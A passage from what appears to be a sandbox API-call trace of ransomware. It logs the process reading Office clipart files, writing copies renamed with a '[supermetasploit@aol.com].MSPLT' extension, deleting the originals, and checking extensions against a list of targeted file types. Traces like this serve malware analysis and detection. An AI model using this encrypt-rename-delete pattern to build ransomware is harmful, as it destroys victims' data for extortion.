dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0299.715] GetLastError () returned 0x0 [0299.715] ReadFile (in: hFile=0x47c, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x386c, lpOverlapped=0x0) returned 1 [0299.718] WriteFile (in: hFile=0x440, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x3870, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x3870, lpOverlapped=0x0) returned 1 [0299.719] ReadFile (in: hFile=0x47c, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0299.719] WriteFile (in: hFile=0x440, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0299.719] SetEndOfFile (hFile=0x440) returned 1 [0299.719] CloseHandle (hObject=0x440) returned 1 [0299.723] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.723] SetEndOfFile (hFile=0x47c) returned 1 [0299.758] CloseHandle (hObject=0x47c) returned 1 [0299.758] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0299.758] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00247_.wmf")) returned 1 [0299.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 68 [0299.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 68 [0299.760] lstrlenW (lpString=".doc") returned 4 [0299.760] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0299.760] lstrlenW (lpString=".docx") returned 5 [0299.760] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0299.760] lstrlenW (lpString=".pdf") returned 4 [0299.760] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0299.760] lstrlenW (lpString=".xls") returned 4 [0299.760] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0299.760] lstrlenW (lpString=".xlsx") returned 5 [0299.760] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0299.760] lstrlenW (lpString=".ppt") returned 4 [0299.760] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0299.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 68 [0299.760] lstrlenW (lpString=".zip") returned 4 [0299.760] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0299.760] lstrlenW (lpString=".rar") returned 4 [0299.760] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0299.760] lstrlenW (lpString=".bz2") returned 4 [0299.761] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0299.761] lstrlenW (lpString=".7z") returned 3 [0299.761] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0299.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 68 [0299.761] lstrlenW (lpString=".dbf") returned 4 [0299.761] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0299.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 68 [0299.761] lstrlenW (lpString=".1cd") returned 4 [0299.761] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0299.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 68 [0299.761] lstrlenW (lpString=".jpg") returned 4 [0299.761] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0299.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 68 [0299.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 68 [0299.761] lstrlenW (lpString=".doc") returned 4 [0299.761] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0299.761] lstrlenW (lpString=".docx") returned 5 [0299.761] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0299.761] lstrlenW (lpString=".pdf") returned 4 [0299.761] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0299.761] lstrlenW (lpString=".xls") returned 4 [0299.761] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0299.761] lstrlenW (lpString=".xlsx") returned 5 [0299.762] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0299.762] lstrlenW (lpString=".ppt") returned 4 [0299.762] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0299.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 68 [0299.762] lstrlenW (lpString=".zip") returned 4 [0299.762] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0299.762] lstrlenW (lpString=".rar") returned 4 [0299.762] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0299.762] lstrlenW (lpString=".bz2") returned 4 [0299.762] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0299.762] lstrlenW (lpString=".7z") returned 3 [0299.762] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0299.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 68 [0299.762] lstrlenW (lpString=".dbf") returned 4 [0299.762] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0299.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 68 [0299.762] lstrlenW (lpString=".1cd") returned 4 [0299.762] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0299.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 68 [0299.762] lstrlenW (lpString=".jpg") returned 4 [0299.762] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0299.762] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0299.763] lstrlenW (lpString="BL00252_.WMF") returned 12 [0299.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00252_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0299.763] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=4708) returned 1 [0299.763] CloseHandle (hObject=0x47c) returned 1 [0299.766] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00252_.wmf")) returned 0x220 [0299.766] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00252_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0299.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00252_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0299.767] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.767] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00252_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0299.768] GetLastError () returned 0x0 [0299.768] ReadFile (in: hFile=0x47c, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x1264, lpOverlapped=0x0) returned 1 [0299.770] WriteFile (in: hFile=0x480, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x1270, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x1270, lpOverlapped=0x0) returned 1 [0299.772] ReadFile (in: hFile=0x47c, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0299.772] WriteFile (in: hFile=0x480, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0299.772] SetEndOfFile (hFile=0x480) returned 1 [0299.772] CloseHandle (hObject=0x480) returned 1 [0299.776] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.776] SetEndOfFile (hFile=0x47c) returned 1 [0299.780] CloseHandle (hObject=0x47c) returned 1 [0299.780] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0299.781] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00252_.wmf")) returned 1 [0299.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 68 [0299.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 68 [0299.781] lstrlenW (lpString=".doc") returned 4 [0299.781] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0299.782] lstrlenW (lpString=".docx") returned 5 [0299.782] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0299.782] lstrlenW (lpString=".pdf") returned 4 [0299.782] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0299.782] lstrlenW (lpString=".xls") returned 4 [0299.782] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0299.782] lstrlenW (lpString=".xlsx") returned 5 [0299.782] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0299.782] lstrlenW (lpString=".ppt") returned 4 [0299.782] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0299.782] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 68 [0299.782] lstrlenW (lpString=".zip") returned 4 [0299.782] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0299.782] lstrlenW (lpString=".rar") returned 4 [0299.782] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0299.782] lstrlenW (lpString=".bz2") returned 4 [0299.782] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0299.782] lstrlenW (lpString=".7z") returned 3 [0299.782] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0299.782] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 68 [0299.782] lstrlenW (lpString=".dbf") returned 4 [0299.782] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0299.782] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 68 [0299.782] lstrlenW (lpString=".1cd") returned 4 [0299.782] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0299.782] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 68 [0299.782] lstrlenW (lpString=".jpg") returned 4 [0299.782] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0299.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 68 [0299.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 68 [0299.783] lstrlenW (lpString=".doc") returned 4 [0299.783] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0299.783] lstrlenW (lpString=".docx") returned 5 [0299.783] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0299.783] lstrlenW (lpString=".pdf") returned 4 [0299.783] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0299.783] lstrlenW (lpString=".xls") returned 4 [0299.783] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0299.783] lstrlenW (lpString=".xlsx") returned 5 [0299.783] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0299.783] lstrlenW (lpString=".ppt") returned 4 [0299.783] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0299.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 68 [0299.783] lstrlenW (lpString=".zip") returned 4 [0299.783] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0299.783] lstrlenW (lpString=".rar") returned 4 [0299.783] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0299.783] lstrlenW (lpString=".bz2") returned 4 [0299.783] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0299.783] lstrlenW (lpString=".7z") returned 3 [0299.783] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0299.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 68 [0299.783] lstrlenW (lpString=".dbf") returned 4 [0299.783] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0299.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 68 [0299.784] lstrlenW (lpString=".1cd") returned 4 [0299.784] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0299.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 68 [0299.784] lstrlenW (lpString=".jpg") returned 4 [0299.784] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0299.784] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0299.784] lstrlenW (lpString="BL00254_.WMF") returned 12 [0299.784] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00254_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0299.786] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=1736) returned 1 [0299.786] CloseHandle (hObject=0x47c) returned 1 [0299.786] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00254_.wmf")) returned 0x220 [0299.786] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00254_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0299.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00254_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0299.787] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.787] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.787] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00254_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0299.788] GetLastError () returned 0x0 [0299.788] ReadFile (in: hFile=0x47c, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x6c8, lpOverlapped=0x0) returned 1 [0300.174] WriteFile (in: hFile=0x480, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x6d0, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x6d0, lpOverlapped=0x0) returned 1 [0300.175] ReadFile (in: hFile=0x47c, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0300.175] WriteFile (in: hFile=0x480, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0300.175] SetEndOfFile (hFile=0x480) returned 1 [0300.175] CloseHandle (hObject=0x480) returned 1 [0300.181] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0300.181] SetEndOfFile (hFile=0x47c) returned 1 [0300.186] CloseHandle (hObject=0x47c) returned 1 [0300.186] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0300.677] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00254_.wmf")) returned 1 [0300.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 68 [0300.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 68 [0300.859] lstrlenW (lpString=".doc") returned 4 [0300.859] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0300.859] lstrlenW (lpString=".docx") returned 5 [0300.859] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0300.859] lstrlenW (lpString=".pdf") returned 4 [0300.859] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0300.859] lstrlenW (lpString=".xls") returned 4 [0300.859] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0300.859] lstrlenW (lpString=".xlsx") returned 5 [0300.859] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0300.859] lstrlenW (lpString=".ppt") returned 4 [0300.859] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0300.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 68 [0300.859] lstrlenW (lpString=".zip") returned 4 [0300.859] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0300.859] lstrlenW (lpString=".rar") returned 4 [0300.860] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0300.860] lstrlenW (lpString=".bz2") returned 4 [0300.860] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0300.860] lstrlenW (lpString=".7z") returned 3 [0300.860] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0300.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 68 [0300.860] lstrlenW (lpString=".dbf") returned 4 [0300.860] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0300.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 68 [0300.860] lstrlenW (lpString=".1cd") returned 4 [0300.860] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0300.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 68 [0300.860] lstrlenW (lpString=".jpg") returned 4 [0300.860] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0300.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 68 [0300.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 68 [0300.860] lstrlenW (lpString=".doc") returned 4 [0300.860] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0300.860] lstrlenW (lpString=".docx") returned 5 [0300.860] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0300.860] lstrlenW (lpString=".pdf") returned 4 [0300.860] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0300.860] lstrlenW (lpString=".xls") returned 4 [0300.860] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0300.860] lstrlenW (lpString=".xlsx") returned 5 [0300.860] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0300.861] lstrlenW (lpString=".ppt") returned 4 [0300.861] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0300.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 68 [0300.861] lstrlenW (lpString=".zip") returned 4 [0300.861] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0300.861] lstrlenW (lpString=".rar") returned 4 [0300.861] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0300.861] lstrlenW (lpString=".bz2") returned 4 [0300.861] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0300.861] lstrlenW (lpString=".7z") returned 3 [0300.861] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0300.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 68 [0300.861] lstrlenW (lpString=".dbf") returned 4 [0300.861] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0300.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 68 [0300.861] lstrlenW (lpString=".1cd") returned 4 [0300.861] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0300.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 68 [0300.861] lstrlenW (lpString=".jpg") returned 4 [0300.861] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0300.861] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0300.861] lstrlenW (lpString="BL00262_.WMF") returned 12 [0300.861] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00262_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0301.006] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=2556) returned 1 [0301.006] CloseHandle (hObject=0x378) returned 1 [0301.006] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00262_.wmf")) returned 0x220 [0303.777] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00262_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0305.463] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00262_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0305.833] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0305.833] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0305.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00262_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0305.834] GetLastError () returned 0x0 [0305.835] ReadFile (in: hFile=0x470, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x9fc, 